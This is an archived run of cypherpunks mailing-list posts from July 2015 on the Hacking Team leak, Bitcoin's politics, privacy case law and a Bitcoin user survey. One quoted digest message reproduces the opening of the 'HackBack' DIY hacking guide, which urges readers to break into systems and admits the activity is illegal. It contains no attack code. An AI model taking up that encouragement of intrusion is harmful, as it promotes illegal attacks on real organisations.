2015 09:00:20 +0200 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: Message-ID: <20150710070020.GF61602@r4> Wouldn't it have been enough to post the url? http://ptrace.fefe.de/fpalm30c3.jpg - Tom From tom at vondein.org Fri Jul 10 00:51:27 2015 From: tom at vondein.org (Tom) Date: Fri, 10 Jul 2015 09:51:27 +0200 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> Message-ID: <20150710075127.GG61602@r4> On Fri, Jul 10, 2015 at 12:17:57AM -0700, Seth wrote: > I actually appreciate content posted in message, get tired of having to > fire up a browser for links. Also every click on a browser link is a > potential attack whereas plain-text in an email is not. Normally I'd agree. But in this case it's different imho. Nobody knows if I read the list posted on wikileaks since the access is tls encrypted. However, now that the whole list has been posted by mail in the clear, everyone sniffing on my mail traffic knows that I've got it. And I'd better not mess with such people: > It's one thing to have dissatisfied customers. It's another to have > dissatisfied customers with death squads. I don't think the company is > going to survive this. [via] - Tom via: https://www.schneier.com/blog/archives/2015/07/more_on_hacking_1.html From guninski at guninski.com Fri Jul 10 00:41:02 2015 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 10 Jul 2015 10:41:02 +0300 Subject: [cryptography] Supersingular Isogeny DH In-Reply-To: References: <54C5545F.3060600@gmail.com> <54C92127.5060900@dev-nu11.de> <54C92732.70202@gmail.com> <54C9C907.5090501@dev-nu11.de> <559E13D3.8040602@dev-nu11.de> Message-ID: <20150710074102.GA2529@sivokote.iziade.m$> On Thu, Jul 09, 2015 at 01:24:12AM -0700, coderman wrote: > > i found this paper a helpful expansion on the subject: > http://cacr.uwaterloo.ca/techreports/2014/cacr2014-20.pdf > "In this paper, we mainly explore the efficiency of implementing recently > proposed isogeny-based post-quantum public key cryptography..." > Disclaimer: I am a lame noob at this. IMHO "post-quantum" is not well defined. To my knowledge it is not known if quantum computers can solve SAT efficiently, which might break much more stuff than factoring. If it happens P=NP with low exponent quantum computers might not give much advantage. P=NP with best complexity O(n^{1000}) probably is irrelevant _in practice_ as of now. Remotely related: http://blog.computationalcomplexity.org/2004/06/impagliazzos-five-worlds.html Impagliazzo's Five Worlds -- georgi From guninski at guninski.com Fri Jul 10 01:11:30 2015 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 10 Jul 2015 11:11:30 +0300 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> Message-ID: <20150710081130.GB2529@sivokote.iziade.m$> On Fri, Jul 10, 2015 at 12:17:57AM -0700, Seth wrote: > On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote: > > >Wouldn't it have been enough to post the url? > > > >http://ptrace.fefe.de/fpalm30c3.jpg > > I actually appreciate content posted in message, get tired of having > to fire up a browser for links. Also every click on a browser link > is a potential attack whereas plain-text in an email is not. Are you sure plain-text email is not potential attack? There have been many bugs in text mail clients. IIRC shell shock affected qmail local delivery (and maybe procmail). From bizdevcon at protonmail.ch Fri Jul 10 08:38:52 2015 From: bizdevcon at protonmail.ch (BizDevCon) Date: Fri, 10 Jul 2015 11:38:52 -0400 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] Message-ID: Yup, same here. – BizDevCon -------- Original Message -------- Subject: Re: From: root at hackingteam.it To: vince at hackingteam.it [and who?] Time (GMT): Jul 10 2015 07:17:57 From: list at sysfu.com To: cypherpunks at cpunks.org On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote: > Wouldn't it have been enough to post the url? > > http://ptrace.fefe.de/fpalm30c3.jpg I actually appreciate content posted in message, get tired of having to fire up a browser for links. Also every click on a browser link is a potential attack whereas plain-text in an email is not. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 728 bytes Desc: not available URL: From coderman at gmail.com Fri Jul 10 11:44:39 2015 From: coderman at gmail.com (coderman) Date: Fri, 10 Jul 2015 11:44:39 -0700 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> Message-ID: On 7/10/15, Seth wrote: > On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote: > >> Wouldn't it have been enough to post the url? .... > > I actually appreciate content posted in message, get tired of having to > fire up a browser for links. Also every click on a browser link is a > potential attack whereas plain-text in an email is not. and another reason, "2015-00136 removed HackBack: A DIY Guide to unwait whistleblowers July 7, 2015" -> REMOVED who knows what is most useful information, when placed into the right context? i do know that the most useful information seems to be the least available. (hence copy) :) best regards, From dan at geer.org Fri Jul 10 08:58:12 2015 From: dan at geer.org (dan at geer.org) Date: Fri, 10 Jul 2015 11:58:12 -0400 Subject: progression of technologies In-Reply-To: Your message of "Sun, 05 Jul 2015 17:44:21 -0500." Message-ID: <20150710155812.D78CF2281ED@palinka.tinho.net> Tom Ritter writes: | On 24 June 2015 at 22:26, wrote: | > Paraphrasing Bonnie Raitt, let's give 'em something germane | > to argue about. In particular, what do I have wrong here: | > | > http://www.csmonitor.com/World/Passcode/Passcode-Voices/2015/0617/Opinion-The-reasonable-expectation-fallacy | | I'm far from certain, but I think what you have wrong is the notion | that wavelength doesn't matter. I think the courts have decided it | does: https://en.wikipedia.org/wiki/Joffe_v._Google,_Inc.#U.S._Supreme_Court | | Specifically, "most of the general public lacks the expertise to | intercept and decode payload data transmitted over a Wi-Fi network." | Therefore the notion that you can point whatever sort of 'camera' you | want at people to capture them isn't accurate. (The other relevant | case is that the police do need a warrant to point infrared cameras at | people's houses.) Well, now we are into dueling Supreme Court cases; see http://caselaw.findlaw.com/us-supreme-court/533/27.html Kyllo v. United States (2001) Despite the Court's attempt to draw a line that is "not only firm but also bright," ante, at 12, the contours of its new rule are uncertain because its protection apparently dissipates as soon as the relevant technology is "in general public use," ante, at 6-7. Yet how much use is general public use is not even hinted at by the Court's opinion, which makes the somewhat doubtful assumption that the thermal imager used in this case does not satisfy that criterion. In any event, putting aside its lack of clarity, this criterion is somewhat perverse because it seems likely that the threat to privacy will grow, rather than recede, as the use of intrusive equipment becomes more readily available. That reads, to me, that what the public adopts limits what I can do or expect. http://geer.tinho.net/geer.rsa.28ii14.txt We Are All Intelligence Officers Now ... In short, we are becoming a society of informants. In short, I have nowhere to hide from you. --dan From coderman at gmail.com Fri Jul 10 12:02:12 2015 From: coderman at gmail.com (coderman) Date: Fri, 10 Jul 2015 12:02:12 -0700 Subject: From: What: [and who?] Message-ID: On 7/10/15, Mirimir wrote: > ... > OK, how many remember waiting for a subpoena during Jim Bell's trial? > > Me, I'd subscribed through a remailer ;) i knew the domain should have stayed on Al-Qaeda.net ... Crypto Wars 2.0 and you're worried about receiving an email list? :P From k at friendlygruppen.se Fri Jul 10 03:25:36 2015 From: k at friendlygruppen.se (ksenia bellman) Date: Fri, 10 Jul 2015 12:25:36 +0200 Subject: cypherpunks Digest, Vol 25, Issue 9 In-Reply-To: References: Message-ID: on the topic of Bitcoin philosophical musings and pressures: There unusually a lot of btc discussion on the list lately: technical (the fork), philosophical and practical. On the philosophical/political side: btc is great, I like it, I use it, but, come on, we all know that by design (increasing difficulty of the chain and proof-of-work system) btc is determined to be a space race. Before you can maintain the network with simple hardware, and get btc for it, now you have to be a mining rig. We know that btc is good for P2P financial transactions, but the first important question now is: How do you earn bitcoin? (as an individual, you can't mine, if you are not a programmer or a designer, how do you earn btc?) It becomes less and less of a question how do you spend btc, but still, unless I mined a lot in the past or bought it for cash, where do I get it? Secondly, the rhetoric we hear often in the mainstream btc discussion is "it is a solution for banking the Unbanked" This talk is obviously dodgy - lets say "the unbanked wants to be banked" if you have an account with nothing in it, and no way of filling it in, there is no point. The only good thing about btc walled vs bank account when its empty is that there is no one is proposing you to get an overdraft or a loan. But still, empty btc wallet is pretty useless. Rather decent response to poitical btc frenzy I found in this post - https://blog.caseykuhlman.com/entries/2014/bitcoin-somaliland.html?utm_source=feedburner&utm_medium=%24feed&utm_campaign=Feed%3A+underWater+desert+Blogging Another mainstream talk is: its not about bitcooin, it is all about blockchain technology. Thats correct, it can be useful for some stuff. But what drives me up the walll is a hype around it mixed with vagueness. "We can build all this amazing socio-technical systems with it" and very rarely, amongst general public (not blockchain devs) you come across concrete ideas of a design. What exactly does this weird data structure does in a very specific social context? What are exact detailed functions it has, how does it integrates with other layers - software and hardware. So the talk "some devs will write cryptographically verifiable scripts for us which interact on the blockchain and it will give the world some cool ways of interaction" is just dangerous. Similar rhetoric brought humanity things such as Facebook. The only thing which i consider right in the blockchain discussion that "ok, it allows adding some features to a system that can be useful in some particular cases" On the technical side: fork, xt-code etc - I would like to organise and stream a panel discussion on WCN channel soon-ish. I dont want to turn cypherpunk list into a Bitcoin Talk :) but will ping a link here and the time we will schedule it. On 8 July 2015 at 01:22, wrote: > Send cypherpunks mailing list submissions to > cypherpunks at cpunks.org > > To subscribe or unsubscribe via the World Wide Web, visit > https://cpunks.org/mailman/listinfo/cypherpunks > or, via email, send a message with subject or body 'help' to > cypherpunks-request at cpunks.org > > You can reach the person managing the list at > cypherpunks-owner at cpunks.org > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of cypherpunks digest..." > > > Today's Topics: > > 1. Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (grarpamp) > 2. "Google is to surveillance capitalism what GM was to > managerial capitalism" (Razer) > 3. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Juan) > 4. Re: Hacking Team has been hacked (hard) (Razer) > 5. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Sean Lynch) > 6. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Lodewijk andré de la porte) > 7. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Sean Lynch) > 8. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Lodewijk andré de la porte) > 9. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Juan) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Tue, 7 Jul 2015 15:21:50 -0400 > From: grarpamp > To: Cpunks List > Cc: bitcoin-dev at lists.linuxfoundation.org > Subject: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: > TiTSwbtneL7ps1QsKvzvw at mail.gmail.com> > Content-Type: text/plain; charset=UTF-8 > > > Then again maybe I am missing the key reasoning for this fork. > > People often miss the fundamental reasons Bitcoin exists, > the various conjoined ethos behind its creation. This is to be > expected, it's so far ouside any thinking or life process they've > ever had to do or been exposed to. It's also partly why figuring > out what to do or code or adopt, is hard. And certainly not made > any easier by the long term need and the current value at stake. > > Creating a system in which a Botswanan can give a few bits > of their impoverished wages to their friend in Mumbai without > it being gated, permitted, hierarchied, middlemanned, taxed, > tracked, stolen and feed-upon until pointless... this simply > doesn't compute for these people. Their school of thought is > centralization, profit, control and oppression. So of course they > see txrate ramming up against an artificial wall as perfectly fine, > it enables and perpetuates their legacy ways. > > Regardless of whichever technical way the various walls are torn down, > what's important is that they are. And that those who are thinking > outside the box do, and continue to, take time to school these > legacy people such that they might someday become enlightened > and join the ethos. > > Otherwise might as well work for ICBC, JPMC, HSBC, BNP, MUFG > and your favorite government. Probably not as much fun though. > > > ------------------------------ > > Message: 2 > Date: Tue, 07 Jul 2015 13:32:35 -0700 > From: Razer > To: cypherpunks at cpunks.org > Subject: "Google is to surveillance capitalism what GM was to > managerial capitalism" > Message-ID: <559C3763.1000205 at riseup.net> > Content-Type: text/plain; charset="utf-8" > > > > Big Other: Surveillance Capitalism and the Prospects of an Information > > Civilization > > > > Shoshana Zuboff, Berkman Center for Internet & Society; Harvard > > Business School > > > > April 4, 2015 > > > > Abstract: > > This article describes an emergent logic of accumulation in the > > networked sphere, ‘surveillance capitalism,’ and considers its > > implications for ‘information civilization.’ Google is to surveillance > > capitalism what General Motors was to managerial capitalism. Therefore > > the institutionalizing practices and operational assumptions of Google > > Inc. are the primary lens for this analysis as they are rendered in > > two recent articles authored by Google Chief Economist Hal Varian. > > > > Varian asserts four uses that follow from computer-mediated > > transactions: ‘data extraction and analysis,’ ‘new contractual forms > > due to better monitoring,’ ‘personalization and customization,’ and > > ‘continuous experiments.’ > > > > An examination of the nature and consequences of these uses sheds > > light on the implicit logic of surveillance capitalism and the global > > architecture of computer mediation upon which it depends. This > > architecture produces a distributed and largely uncontested new > > expression of power that I christen: ‘Big Other.’ It is constituted by > > unexpected and often illegible mechanisms of extraction, > > commodification, and control that effectively exile persons from their > > own behavior while producing new markets of behavioral prediction and > > modification. Surveillance capitalism challenges democratic norms and > > departs in key ways from the centuries long evolution of market > > capitalism. > > > > Number of Pages in PDF File: 15 > > > > Keywords: surveillance capitalism, big data, Google, information > > society, privacy, internet of everything > > http://papers.ssrn.com/sol3/papers.cfm?abstract_id=2594754 > > -------------- next part -------------- > A non-text attachment was scrubbed... > Name: signature.asc > Type: application/pgp-signature > Size: 819 bytes > Desc: OpenPGP digital signature > URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150707/74fb2b34/attachment-0001.sig > > > > ------------------------------ > > Message: 3 > Date: Tue, 7 Jul 2015 18:57:16 -0300 > From: Juan > To: cypherpunks at cpunks.org > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: <559c4b24.d6a48c0a.a6394.0140 at mx.google.com> > Content-Type: text/plain; charset=US-ASCII > > On Tue, 7 Jul 2015 15:21:50 -0400 > grarpamp wrote: > > > > Creating a system in which a Botswanan can give a few bits > > of their impoverished wages to their friend in Mumbai > > > What? Bitcoin exists so that rich people in western countries > especially the US can become even richer. So far it worked > pretty well. > > Bitcoin hasn't led to any meaningful political/economic > change yet, apart from possibly triggering the demise of > government cash, which would be a complete disaster. Talk about > 'unintended consequences' (unintended?) > > A likely scenario exists in which there wouldn't be any > independent crypto-currency. There would be fully 'traceable' > electronic currencies controlled as always by the state and the > banking mafia. > > > > > without > > it being gated, permitted, hierarchied, middlemanned, taxed, > > tracked, stolen and feed-upon until pointless... this simply > > doesn't compute for these people. Their school of thought is > > centralization, profit, control and oppression. So of course they > > see txrate ramming up against an artificial wall as perfectly fine, > > it enables and perpetuates their legacy ways. > > > > Regardless of whichever technical way the various walls are torn down, > > what's important is that they are. And that those who are thinking > > outside the box do, and continue to, take time to school these > > legacy people such that they might someday become enlightened > > and join the ethos. > > > > Otherwise might as well work for ICBC, JPMC, HSBC, BNP, MUFG > > and your favorite government. Probably not as much fun though. > > > > ------------------------------ > > Message: 4 > Date: Tue, 07 Jul 2015 15:11:20 -0700 > From: Razer > To: cypherpunks at cpunks.org > Subject: Re: Hacking Team has been hacked (hard) > Message-ID: <559C4E88.4050506 at riseup.net> > Content-Type: text/plain; charset="utf-8" > > > > On 07/05/2015 08:31 PM, Christian Gagneraud wrote: > > As nobody has reported it yet, here we go: > > https://twitter.com/hackingteam > > > > Ahhh! Here we go... > > > (In Solidarity with:) “everyone in Gaza, Israeli > > conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, > > anakata, and all other imprisoned hackers, dissidents, and criminals!” > > By the hacker who doxxed Hacking Team: > > > | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | > > | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | > > | _ | (_| | (__| < | |_) | (_| | (__| <|_| > > |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) > > > > A DIY Guide for those without the patience to wait for > whistleblowers > > > > > > --[ 1 ]-- Introduction > > > > I'm not writing this to brag about what an 31337 h4x0r I am and what m4d > sk1llz > > it took to 0wn Gamma. I'm writing this to demystify hacking, to show how > simple > > it is, and to hopefully inform and inspire you to go out and hack shit. > If you > > have no experience with programming or hacking, some of the text below > might > > look like a foreign language. Check the resources section at the end to > help you > > get started. And trust me, once you've learned the basics you'll realize > this > > really is easier than filing a FOIA request. > > > > > > --[ 2 ]-- Staying Safe > > > > This is illegal, so you'll need to take same basic precautions: > > http://0x27.me/HackBack/0x00.txt (wget this file if paranoid) > > Via Morgan Mayhem > > https://twitter.com/headhntr/status/618513829282975744 > > Mirrored @ my tumblr > > http://auntieimperial.tumblr.com/post/123489352994 > > > -------------- next part -------------- > A non-text attachment was scrubbed... > Name: signature.asc > Type: application/pgp-signature > Size: 819 bytes > Desc: OpenPGP digital signature > URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150707/3e5a54cc/attachment-0001.sig > > > > ------------------------------ > > Message: 5 > Date: Tue, 07 Jul 2015 22:27:01 +0000 > From: Sean Lynch > To: Juan , cypherpunks at cpunks.org > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: > < > CAHKdp-kqaytz2DJqz-a_wynZNKpi147yNWXMpUfBQWmuLuZu-w at mail.gmail.com> > Content-Type: text/plain; charset="utf-8" > > On Tue, Jul 7, 2015 at 3:02 PM Juan wrote: > > > On Tue, 7 Jul 2015 15:21:50 -0400 > > grarpamp wrote: > > > > > > > Creating a system in which a Botswanan can give a few bits > > > of their impoverished wages to their friend in Mumbai > > > > > > What? Bitcoin exists so that rich people in western countries > > especially the US can become even richer. So far it worked > > pretty well. > > > > Really? What rich person has gotten richer through Bitcoin so far? > Remittances seem like the biggest use of Bitcoin at the moment. Sure, > there's plenty of speculation, but your claim that Bitcoin's purpose is to > make the rich richer is also speculation. And FUD. > > > > Bitcoin hasn't led to any meaningful political/economic > > change yet, apart from possibly triggering the demise of > > government cash, which would be a complete disaster. Talk about > > 'unintended consequences' (unintended?) > > > > I can't imagine you've read a single thing written by the people who > influenced the creation of Bitcoin if you think that the collapse of fiat > currencies is an unintended consequence. Any fiat currency that is so bad > that its users prefer to use Bitcoin deserves to collapse. Of course, so > far, while Bitcoin has become popular in places like Argentina and > Venezuela, the US dollar remains by far the more popular alternative > currency in those places. And if Greece exits the Euro and starts printing > Drachmas there, they will have to worry about people trading their Drachmas > for Euros, not for Bitcoin. > > > > A likely scenario exists in which there wouldn't be any > > independent crypto-currency. There would be fully 'traceable' > > electronic currencies controlled as always by the state and the > > banking mafia. > > > > By what evidence do you estimate that this is a "likely" scenario? You may > be right that many nation-states and banks will be loathe to accept an > untraceable and uncontrollable crypto-currency, but that's the whole point; > they're not going to have a choice. Cryptocurrencies don't have to be legal > to be disruptive. The main problem that they've run up against before now > is the lack of healthy underground markets to take advantage of them. Given > time, governments' and banks' opinions and policies about cryptocurrencies > will become irrelevant. > -------------- next part -------------- > An HTML attachment was scrubbed... > URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150707/842a6c5c/attachment-0001.html > > > > ------------------------------ > > Message: 6 > Date: Wed, 8 Jul 2015 07:50:04 +0900 > From: Lodewijk andré de la porte > To: Sean Lynch > Cc: "cypherpunks at cpunks.org" > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: > < > CAHWD2rLq2QpL+LM8NvS5yhiAEm7zUDKFqXrbrAsabLWzV7XmdA at mail.gmail.com> > Content-Type: text/plain; charset="utf-8" > > 2015-07-08 7:27 GMT+09:00 Sean Lynch : > > > What? Bitcoin exists so that rich people in western countries > >> especially the US can become even richer. So far it worked > >> pretty well. > >> > > > > Really? What rich person has gotten richer through Bitcoin so far? > > Remittances seem like the biggest use of Bitcoin at the moment. Sure, > > there's plenty of speculation, but your claim that Bitcoin's purpose is > to > > make the rich richer is also speculation. And FUD. > > > > Yours would the Uncertainty and Doubt, I see. > > Bitcoin is cold hard money - therefore benefiting those that can exploit it > best. The most capital you have, the better you can exploit it. Therefore, > the wealthy stand more to benefit from Bitcoin than anyone else. Any other > effect would indicate softness of Bitcoin or some human issue. It does > prevent (certain forms of) suppression; it's very hard to censor financial > transactions on the Bitcoin network. It also provides a great deal of > financial and administrative utility to all in similar quantity, it levels > the playing field of the poor/rich somewhat. > -------------- next part -------------- > An HTML attachment was scrubbed... > URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150708/698a4393/attachment-0001.html > > > > ------------------------------ > > Message: 7 > Date: Tue, 07 Jul 2015 22:53:36 +0000 > From: Sean Lynch > To: Lodewijk andré de la porte > Cc: "cypherpunks at cpunks.org" > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: > DWWPs-hkkYPwFg at mail.gmail.com> > Content-Type: text/plain; charset="utf-8" > > On Tue, Jul 7, 2015 at 3:50 PM Lodewijk andré de la porte > wrote: > > > 2015-07-08 7:27 GMT+09:00 Sean Lynch : > > > >> What? Bitcoin exists so that rich people in western countries > >>> especially the US can become even richer. So far it worked > >>> pretty well. > >>> > >> > >> Really? What rich person has gotten richer through Bitcoin so far? > >> Remittances seem like the biggest use of Bitcoin at the moment. Sure, > >> there's plenty of speculation, but your claim that Bitcoin's purpose is > to > >> make the rich richer is also speculation. And FUD. > >> > > > > Yours would the Uncertainty and Doubt, I see. > > > > Bitcoin is cold hard money - therefore benefiting those that can exploit > > it best. The most capital you have, the better you can exploit it. > > Therefore, the wealthy stand more to benefit from Bitcoin than anyone > else. > > Any other effect would indicate softness of Bitcoin or some human issue. > It > > does prevent (certain forms of) suppression; it's very hard to censor > > financial transactions on the Bitcoin network. It also provides a great > > deal of financial and administrative utility to all in similar quantity, > it > > levels the playing field of the poor/rich somewhat. > > > > Perhaps my response was a bit hyperbolic, but that is a very different > claim than "Bitcoin exists so that rich people in western countries > especially the US can become even richer." > -------------- next part -------------- > An HTML attachment was scrubbed... > URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150707/51f23c6b/attachment-0001.html > > > > ------------------------------ > > Message: 8 > Date: Wed, 8 Jul 2015 08:21:48 +0900 > From: Lodewijk andré de la porte > To: Sean Lynch > Cc: "cypherpunks at cpunks.org" > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: > bz0hQ at mail.gmail.com> > Content-Type: text/plain; charset="utf-8" > > 2015-07-08 7:53 GMT+09:00 Sean Lynch : > > > > Perhaps my response was a bit hyperbolic, but that is a very different > > claim than "Bitcoin exists so that rich people in western countries > > especially the US can become even richer." > > > > Put on your Juanglasses and the difference is hardly perceptible ;) > > Still not sure what to make of the guy's constant rant-mode. It just seems > to cause defensive and less constructive argumentation. > -------------- next part -------------- > An HTML attachment was scrubbed... > URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150708/8a247750/attachment-0001.html > > > > ------------------------------ > > Message: 9 > Date: Tue, 7 Jul 2015 20:22:32 -0300 > From: Juan > To: cypherpunks at cpunks.org > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: <559c5f23.c328370a.7776d.1c71 at mx.google.com> > Content-Type: text/plain; charset=US-ASCII > > On Tue, 07 Jul 2015 22:27:01 +0000 > Sean Lynch wrote: > > > On Tue, Jul 7, 2015 at 3:02 PM Juan wrote: > > > > > On Tue, 7 Jul 2015 15:21:50 -0400 > > > grarpamp wrote: > > > > > > > > > > Creating a system in which a Botswanan can give a few bits > > > > of their impoverished wages to their friend in Mumbai > > > > > > > > > What? Bitcoin exists so that rich people in western > > > countries especially the US can become even richer. So far it worked > > > pretty well. > > > > > > > Really? What rich person has gotten richer through Bitcoin so far? > > > It seems kinda obvious that virtually all bitcoin developers > and users *in the west* are richer than people in Africa and > India. > > That's what I was getting at. Bitcoin devs - *already > rich by 'third world' standards* - are richer now. Millionaires > even (notice that grarpamp was talking about impoverished > wages...and people) > > > > > Remittances seem like the biggest use of Bitcoin at the moment. Sure, > > there's plenty of speculation, but your claim that Bitcoin's purpose > > is to make the rich richer is also speculation. And FUD. > > > So what amount of btc is being used to make payments between > Botswana and Mumbai? > > What amount of btc is being used to speculate/gamble in a few > big, centralized and fully NSA-AML-monitored exchanges? > > > > > > > > > Bitcoin hasn't led to any meaningful political/economic > > > change yet, apart from possibly triggering the demise of > > > government cash, which would be a complete disaster. Talk > > > about 'unintended consequences' (unintended?) > > > > > > > I can't imagine you've read a single thing written by the people who > > influenced the creation of Bitcoin if you think that the collapse of > > fiat currencies is an unintended consequence. > > > But I said *cash* not fiat. And the collapse of relatively > untraceable *cash* is *bad*. > > What we may end up with is FIAT currencies and NO CASH > option* for those fiat currencies. Bad. Pretty bad. > > > *aka credit cards. > > > > Any fiat currency that > > is so bad that its users prefer to use Bitcoin deserves to collapse. > > Of course, so far, while Bitcoin has become popular in places like > > Argentina > > Do you know where I live? Of course you don't have to know > where I live. But you'll know it in a second anyway. I live in > argentina - and let me tell you, bitcoin isnt exactly 'popular' > here. > > > > and Venezuela, the US dollar remains by far the more > > popular alternative currency in those places. > > Yep, that's quite correct as far as argentina goes. I suspect > it's true regarding venezuela as well. > > > > > And if Greece exits the > > Euro and starts printing Drachmas there, they will have to worry > > about people trading their Drachmas for Euros, not for Bitcoin. > > > > > > > > > > > A likely scenario exists in which there wouldn't be any > > > independent crypto-currency. There would be fully > > > 'traceable' electronic currencies controlled as always by the state > > > and the banking mafia. > > > > > > > By what evidence do you estimate that this is a "likely" scenario? > > > The evidence is called 'history'. That, and the nature of > government and its business 'partners' - or accomplices. > > > > You may be right that many nation-states and banks will be loathe to > > accept an untraceable and uncontrollable crypto-currency, but that's > > the whole point; > > You seem to be assuming that an uncontrollable and untraceable > crypto-currency exist? I'm not seeing anything of the sort. > > > > they're not going to have a choice. Cryptocurrencies > > don't have to be legal to be disruptive. > > And yet there seems to be a fair amount of people in the bitcoin > 'community' who are quite eager (or desperate) to have bitcoin > 'regulated' so that it becomes 'respectable', 'legal'...and > usable. > > Of course, this isn't a shortcoming that only affects btc. > Anything that the government 'outlaws' becomes harder to > transact. > > > > > The main problem that > > they've run up against before now is the lack of healthy underground > > markets to take advantage of them. Given time, governments' and > > banks' opinions and policies about cryptocurrencies will become > > irrelevant. > > > I do wish that was actually the case, but I think that view > doesn't fully take into account the capabilities of the > 'enemy'. > > > > J. > > > > > > ------------------------------ > > Subject: Digest Footer > > _______________________________________________ > cypherpunks mailing list > cypherpunks at cpunks.org > https://cpunks.org/mailman/listinfo/cypherpunks > > > ------------------------------ > > End of cypherpunks Digest, Vol 25, Issue 9 > ****************************************** > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 35134 bytes Desc: not available URL: From shelley at misanthropia.org Fri Jul 10 13:26:35 2015 From: shelley at misanthropia.org (Shelley) Date: Fri, 10 Jul 2015 13:26:35 -0700 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> Message-ID: <20150710202619.6089EC0001F@frontend1.nyi.internal> On July 10, 2015 11:52:10 AM coderman wrote: > On 7/10/15, Seth wrote: > > On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote: > > > >> Wouldn't it have been enough to post the url? .... > > > > I actually appreciate content posted in message, get tired of having to > > fire up a browser for links. Also every click on a browser link is a > > potential attack whereas plain-text in an email is not. > > > and another reason, > "2015-00136 removed HackBack: A DIY Guide to unwait whistleblowers > July 7, 2015" > -> REMOVED > > > who knows what is most useful information, when placed into the right context? > > i do know that the most useful information seems to be the least > available. (hence copy) > > :) > Agreed. Now it's archived on countless HDDs and mirrors, good thinking! Many of us already are on any number of "lists" anyway; I'm sure just subscribing to this list puts us on yet another. I stopped worrying about that stuff long ago. It's just an intimidation tactic to try to get us to self-censor ourselves and save them the trouble. Fuck them and fuck that. You're on "lists" no matter what you do, or do not do. I'm not on Facebook or any other social media- that's definitely a list-able offense ;) Just ignore them and use the regular, common sense precautions that should be part of your daily routine anyway. *This is also in response to your subsequent email, which is probably apparent :D -S From grarpamp at gmail.com Fri Jul 10 13:34:29 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 10 Jul 2015 16:34:29 -0400 Subject: Bitcoin User??? A Euro worth of BTC for your thoughts... Message-ID: If you are interested in improving Bitcoin, and making about a Euro (4.2 mBTC) in return, read on... We are researchers conducting a Bitcoin user study and are seeking participants. Bitcoin users are kindly invited to participate. Our survey is anonymous and takes under 10 minutes to complete. As a reward you receive BTC. The goal of this survey is to learn about user perceptions regarding Bitcoin and will cover aspects such as key management, wallet usage and risk perception. As we believe that these results will be valuable to the entire community, we will publish our results and make them available to everyone. This is the link to the survey: https://www.soscisurvey.de/BTC_study/?r=932181 SBA Research SBA Research was founded in 2006 as the first Austrian research center for information security by the TU Wien, the Graz University of Technology and the University of Vienna. Funded largely by the national initiative for COMET. Along with many other international academic and business research partners we jointly work on challenges ranging from organizational to technical security. We are 100 strong. https://www.sba-research.org/ SoSci Survey SoSci Survey can help you carry out your professional online survey: create online questionnaire, send invitations (including follow-ups), Data download (SPSS, GNU R, Excel). It was designed specifically for scientific surveys and is continuously developed for daily research practice. The software supports a project manager and allows flexibility in the design of questionnaires. The most demanding and complex designs can be realized. https://www.soscisurvey.de/ From juan.g71 at gmail.com Fri Jul 10 13:22:50 2015 From: juan.g71 at gmail.com (Juan) Date: Fri, 10 Jul 2015 17:22:50 -0300 Subject: cypherpunks Digest, Vol 25, Issue 9 In-Reply-To: References: Message-ID: <55a02976.066a8c0a.92c55.fffff74d@mx.google.com> On Fri, 10 Jul 2015 12:25:36 +0200 ksenia bellman wrote: > Before you can maintain the network with simple hardware, > and get btc for it, now you have to be a mining rig. Right. > We know that btc > is good for P2P financial transactions, Well, that's the theory, but as you just mentioned, at least part of the network isn't looking too much P2P-like anymore... > but the first important > question now is: How do you earn bitcoin? (as an individual, you > can't mine, if you are not a programmer or a designer, how do you > earn btc?) Working for people who pay in btc. For instance, selling drugs to them =) > It becomes less and less of a question how do you spend > btc, but still, unless I mined a lot in the past or bought it for > cash, where do I get it? I don't think that's really a 